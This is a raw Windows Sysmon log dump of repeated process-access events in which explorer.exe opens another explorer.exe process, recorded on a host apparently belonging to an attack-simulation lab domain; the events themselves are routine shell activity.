16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246060Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246059Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246058Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246057Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246056Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246055Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246054Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246053Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246052Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246051Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246050Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246049Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246048Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246047Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246046Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246045Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246044Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246043Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246042Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246041Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246040Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246039Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246038Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246037Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246036Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246035Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246034Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:29.702{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002246033Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 